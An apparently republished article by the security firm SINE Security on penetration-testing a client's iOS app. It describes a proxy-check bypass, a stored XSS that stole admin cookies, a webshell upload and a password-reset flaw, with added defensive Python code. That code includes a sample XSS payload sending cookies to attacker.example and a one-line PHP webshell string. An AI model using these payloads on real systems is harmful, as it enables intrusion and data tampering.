

APP security testing: how to penetration-test an APP and detect its vulnerabilities

2025-03-06 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/01 Report

There are few security articles on the Internet about penetration testing of iOS APPs. A few days ago a customer's APP data was tampered with: attackers were able to withdraw funds at will, credit themselves with arbitrary amounts of coins, and convert those coins, causing the platform heavy financial losses. Through a friend's introduction the customer came to our company, SINE Security, for a solution that would stop the APP from being tampered with and attacked again. In response we immediately set up a security emergency response team to carry out a comprehensive penetration test of the customer's APP and server.

First of all, we needed to understand the architecture of the customer's iOS APP. After a detailed inspection and code review by our security engineers, the picture was this: the backend is built in PHP with a MySQL database, the front end with Vue, and the server runs Linux (CentOS).

We set up a penetration-testing environment, installed the customer's latest APP on a phone, and opened port 8098 as a proxy port to capture and intercept the APP's traffic. As soon as the APP was opened, however, it flashed and closed. Packet capture showed that the APP has a proxy-detection mechanism: whenever the phone accesses the network through a proxy, the APP decides that a proxy is in use, returns an error value, forces the APP to exit, and cuts off all of its network connections. For SINE Security this is simple to bypass. We decompiled the IPA package and, through code analysis, traced the proxy check back to its source: a separate piece of code that, when the value it examines is judged to be 1, lets execution continue directly. We hooked that code so that the check always takes the "1" path, bypassing the proxy-detection mechanism.

Next, our SINE Security engineers carried out a comprehensive penetration test of the APP's normal functions: user registration, password recovery, login, user messages, profile picture upload, coin recharge, the secondary password, and so on. In the user-message function we found that a malicious XSS (cross-site scripting) payload can be written to the backend: the APP POSTs the message data to the background, and when the background administrator views the user's message the payload executes in the administrator's browser and sends the administrator's cookie value and the background login address to the attacker. Using this XSS vulnerability the attacker obtains administrator rights to the background. The earlier tampering with member data was caused by this vulnerability.

The customer also told us that some of the operations that modified members had left no operation log in the background, whereas normally, when an administrator changes a member's settings in the background, an operation log is recorded. Guided by this feedback we continued the penetration test. As SINE Security expected, the background has a picture-upload function. We intercepted the upload POST, changed the uploaded file's extension to .php, and sent the modified POST data on; this bypassed the code's check and placed a PHP script file in the backend image directory.
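The two background flaws described above, the stored XSS in user messages and the picture upload that accepted a .php extension, come down to two missing server-side checks. The block below is an added example, not code from the article or from SINE Security: it shows the vulnerable behaviour beside a hardened version of each. The customer's backend is PHP; this is written in Python so that it runs stand-alone, and the function names, the `IMAGE_SIGNATURES` table and the sample payloads are assumptions for illustration, not the customer's code.

```python
"""Added example, not code from the original article or from SINE Security.
Two server-side checks for the two background flaws described above: the
stored XSS in user messages and the picture upload that accepted a .php
extension. Function names and IMAGE_SIGNATURES are assumptions for
illustration; the customer's backend is PHP and was not published."""
import html
import os
import secrets

# Magic bytes of the image types a picture-upload feature should accept.
IMAGE_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def render_message_vulnerable(message: str) -> str:
    """The bug: the admin page inserts the user's message into HTML verbatim,
    so a <script> payload in a message runs in the administrator's browser."""
    return "<td>%s</td>" % message


def render_message_safe(message: str) -> str:
    """Output-encode for the HTML body context before the admin page renders it."""
    return "<td>%s</td>" % html.escape(message, quote=True)


def session_cookie_header(session_id: str) -> str:
    """HttpOnly stops document.cookie from exposing the admin session to an XSS
    payload; Secure and SameSite limit where the browser will send it."""
    return ("Set-Cookie: PHPSESSID=%s; Path=/; HttpOnly; Secure; SameSite=Lax"
            % session_id)


def validate_upload_vulnerable(filename: str, data: bytes) -> str:
    """The bug: the client-supplied filename is trusted, so a tampered POST that
    renames shell.png to shell.php is stored in the image directory, where the
    web server hands it to the PHP interpreter."""
    return filename


def validate_upload(filename: str, data: bytes) -> str:
    """Allow-list the extension, check the file's magic bytes, refuse script
    markers, and replace the client's name with a random one.
    Returns the name to store under, or raises ValueError."""
    base = os.path.basename(filename)
    # Exactly one dot: rejects shell.php.png, shell.php.jpg and similar tricks.
    if base.count(".") != 1:
        raise ValueError("unexpected filename shape: %r" % base)
    ext = os.path.splitext(base)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        raise ValueError("extension not allowed: %r" % ext)
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        raise ValueError("content does not match extension %r" % ext)
    # Defence in depth against image/PHP polyglots; the upload directory must
    # also be non-executable, since this check alone is not a guarantee.
    if b"<?php" in data or b"<?=" in data:
        raise ValueError("script markers found in image data")
    return secrets.token_hex(16) + ext


def upload_allowed(filename: str, data: bytes) -> bool:
    """Convenience wrapper: True if validate_upload accepts the file."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed payload of the kind that leaks the admin cookie to an attacker host.
    payload = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
    print(render_message_vulnerable(payload))
    print(render_message_safe(payload))
    print(upload_allowed("shell.php", b"<?php system($_GET['c']); ?>"))       # False
    print(upload_allowed("photo.png", IMAGE_SIGNATURES[".png"] + b"\0" * 16))  # True
```

Even with the check in place, uploads should be stored outside the web root or in a directory for which nginx never passes requests to php-fpm; the extension and magic-byte checks are only the first layer.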

An uploaded website backdoor of this kind is also called a webshell. The customer's website background has a file upload vulnerability that allows files of any format to be uploaded. We also logged on to the customer's server to analyse the nginx logs, and found the attacker's traces: on the evening of December 20 the attacker obtained background permissions through the XSS vulnerability, uploaded a webshell through the file upload vulnerability, used the webshell to read the APP's database configuration file, and then modified member data directly through the webshell's built-in MySQL connection function. This explained how the customer's member data had been tampered with, and the problem was resolved. We also penetration-tested the other functions and found a logic vulnerability in the user password recovery function: by bypassing the verification code, the password of any member account can be changed directly.
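The log analysis described above, reconstructing the chain from admin access to webshell upload to webshell execution, is the kind of triage a responder would script. The block below is an added example, not part of the article or of SINE Security's tooling: it parses nginx combined-format lines and flags any request that executed a script under a directory that should only serve images. The log lines are constructed for the example, and the paths (`/admin/upload.php`, `/uploads/images/`) and addresses are assumed names, not the customer's.

```python
"""Added example, not part of the original article or of SINE Security's
tooling: triage of nginx access logs for the attack chain described above
(XSS against the admin, upload of a webshell, execution of that webshell).
The log lines are constructed for this example; the paths and addresses
are assumed names, not the customer's."""
import re

# nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Directories that should only ever serve static images (assumed name).
UPLOAD_DIRS = ("/uploads/images/",)
# Extensions nginx would normally hand to the PHP interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.I)
# Admin upload endpoint (assumed name).
ADMIN_UPLOAD = "/admin/upload.php"

# Constructed sample: 203.0.113.7 is the attacker, 198.51.100.22 the administrator.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Dec/2024:22:41:03 +0800] "POST /api/message HTTP/1.1" 200 31 "-" "AppClient/1.0 CFNetwork/1404.0.5 Darwin/22.3.0"
198.51.100.22 - - [20/Dec/2024:23:05:17 +0800] "GET /admin/message_list.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Dec/2024:23:05:19 +0800] "GET /admin/index.php HTTP/1.1" 200 2201 "-" "python-requests/2.31.0"
203.0.113.7 - - [20/Dec/2024:23:06:40 +0800] "POST /admin/upload.php HTTP/1.1" 200 57 "http://app.example/admin/" "python-requests/2.31.0"
203.0.113.7 - - [20/Dec/2024:23:06:52 +0800] "GET /uploads/images/20241220230640.php?cmd=id HTTP/1.1" 200 164 "-" "python-requests/2.31.0"
203.0.113.7 - - [20/Dec/2024:23:09:11 +0800] "POST /uploads/images/20241220230640.php HTTP/1.1" 200 912 "-" "python-requests/2.31.0"
198.51.100.22 - - [21/Dec/2024:09:12:00 +0800] "GET /uploads/images/avatar_1023.jpg HTTP/1.1" 200 40233 "-" "Mozilla/5.0"
"""


def parse_log(text: str) -> list:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def find_webshell_hits(entries: list) -> list:
    """Requests that executed a script under a directory that should only serve images."""
    return [e for e in entries
            if e["path"].startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(e["path"])]


def suspect_ips(entries: list) -> list:
    """Client addresses that touched a script in an upload directory."""
    return sorted({e["ip"] for e in find_webshell_hits(entries)})


def upload_posts_by(entries: list, ip: str) -> list:
    """The admin upload requests from a suspect address: the webshell upload itself."""
    return [e for e in entries
            if e["ip"] == ip and e["method"] == "POST" and e["path"] == ADMIN_UPLOAD]


def timeline_for_ip(entries: list, ip: str) -> list:
    """Every request from the address, in log order, for the incident report."""
    return [(e["time"], e["method"], e["path"], e["status"])
            for e in entries if e["ip"] == ip]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for ip in suspect_ips(entries):
        print("suspect", ip, "uploads:", len(upload_posts_by(entries, ip)))
        for row in timeline_for_ip(entries, ip):
            print("  ", *row)
```

The first-seen time of the suspect address against `/admin/` is also worth checking against the administrator's own sessions: in the constructed sample it arrives two seconds after the administrator opened the message list, which is what a cookie stolen by stored XSS looks like in the log.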

The APP penetration test found three vulnerabilities in total: an XSS cross-site scripting vulnerability, a file upload vulnerability, and a logic vulnerability in user password recovery. In our security community all three are rated high-risk: they can have a serious impact on the APP, the website and the server, and cannot be ignored. APP security is what keeps users' data safe, and only when users are safe can the platform and its users both benefit. If you do not understand penetration testing, you can also ask a professional website security company or penetration testing company to test it for you.
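The article says only that the password recovery flow could be bypassed around the verification code. The block below is an added example, not code from the article or from SINE Security: it shows one common shape of that logic flaw, where the server records "verified" on the session without binding it to an account, beside a hardened flow where the account comes from a single-use token. The in-memory user store, class and method names are assumptions for illustration; the customer's PHP backend was not published.

```python
"""Added example, not code from the article or from SINE Security. One common
shape of the password recovery logic flaw described above, next to a hardened
flow. USERS, class and method names are assumptions for illustration."""
import hashlib
import hmac
import secrets
import time

# Constructed user store (plaintext passwords only to keep the example short).
USERS = {
    "alice":  {"phone": "+8613800000001", "password": "alice-old"},
    "victim": {"phone": "+8613800000002", "password": "s3cret"},
}


class VulnerableReset:
    """Step 2 only sets a 'verified' flag on the session; step 3 trusts the
    username in the request. An attacker verifies a code for an account they
    own, then sends step 3 with username=victim."""

    def __init__(self):
        self.codes = {}
        self.session = {}

    def send_code(self, username: str) -> str:
        code = "%06d" % secrets.randbelow(10 ** 6)
        self.codes[username] = code
        return code  # would go out by SMS; returned here for the example

    def verify_code(self, username: str, code: str) -> bool:
        if self.codes.get(username) == code:
            self.session["verified"] = True  # not bound to username
            return True
        return False

    def reset_password(self, username: str, new_password: str) -> bool:
        if not self.session.get("verified"):
            return False
        USERS[username]["password"] = new_password
        return True


class HardenedReset:
    """Codes are stored hashed, with an expiry and an attempt limit; a correct
    code yields a single-use token bound to the account, and step 3 takes the
    account from the token, never from the request."""

    def __init__(self, ttl: int = 300, max_attempts: int = 5):
        self.ttl = ttl
        self.max_attempts = max_attempts
        self.pending = {}  # username -> [code_hash, expires_at, attempts]
        self.tokens = {}   # token_hash -> (username, expires_at)

    @staticmethod
    def _h(value: str) -> str:
        return hashlib.sha256(value.encode()).hexdigest()

    def send_code(self, username: str, now=None) -> str:
        now = time.time() if now is None else now
        code = "%06d" % secrets.randbelow(10 ** 6)
        self.pending[username] = [self._h(code), now + self.ttl, 0]
        return code

    def verify_code(self, username: str, code: str, now=None):
        """Returns a reset token on success, None otherwise."""
        now = time.time() if now is None else now
        rec = self.pending.get(username)
        if rec is None or now > rec[1] or rec[2] >= self.max_attempts:
            return None
        rec[2] += 1
        if not hmac.compare_digest(rec[0], self._h(code)):
            return None
        del self.pending[username]  # a code is good once
        token = secrets.token_urlsafe(32)
        self.tokens[self._h(token)] = (username, now + self.ttl)
        return token

    def reset_password(self, token: str, new_password: str, now=None) -> bool:
        now = time.time() if now is None else now
        rec = self.tokens.pop(self._h(token), None)  # single use
        if rec is None or now > rec[1]:
            return False
        username, _ = rec
        USERS[username]["password"] = new_password
        return True


if __name__ == "__main__":
    v = VulnerableReset()
    v.verify_code("alice", v.send_code("alice"))
    print("vulnerable, victim reset by attacker:", v.reset_password("victim", "pwned"))
    h = HardenedReset()
    tok = h.verify_code("alice", h.send_code("alice"))
    print("hardened, alice reset with own token:", h.reset_password(tok, "new"))
    print("hardened, token replay:", h.reset_password(tok, "again"))
```

The hardened flow still needs a rate limit on `send_code` itself (each call issues a fresh code and resets the attempt counter) and the token should be delivered to the verified channel rather than echoed to whoever called the API.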





© 2024 shulou.com SLNews company. All rights reserved.
